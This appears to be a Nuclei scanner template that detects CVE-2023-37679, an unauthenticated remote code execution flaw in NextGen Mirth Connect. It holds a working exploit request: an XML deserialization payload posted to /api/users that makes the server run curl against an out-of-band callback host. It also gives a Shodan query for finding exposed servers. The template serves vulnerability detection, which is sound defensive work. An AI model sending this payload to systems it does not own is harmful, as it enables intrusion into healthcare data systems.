id: CVE-2023-37679

info:
  name: NextGen Mirth Connect - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability.
  reference:
    - https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-37679
  classification:
    cve-id: CVE-2023-37679
  metadata:
    max-request: 2
    verified: true
    shodan-query: title:"mirth connect administrator"
  tags: cve,cve2023,nextgen,rce

http:
  - raw:
      - |
        GET /api/server/version HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: OpenAPI

      - |
        POST /api/users HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: OpenAPI
        Content-Type: application/xml

        foo java.lang.Comparable curl http://{{interactsh-url}}/ start

    matchers:
      - type: dsl
        dsl:
          - 'compare_versions(version, "<4.4.1")'
          - 'contains(interactsh_protocol, "dns")'
          - 'status_code_1 == 200 && status_code_2 == 500'
        condition: and

    extractors:
      - type: regex
        part: body_1
        name: version
        group: 1
        regex:
          - '(.*)'
        internal: true
# digest: 4a0a004730450221008e36cf08f81d2103e905d890bf31e0fc3f94f15eb231fd889a46d46d9cd7b18202205a5d3b1c4a8a0757dea7ab3b0c276c28dedc720c80d0179827f1ccaabc1fc305:922c64590222798bb761d5b6d8e72950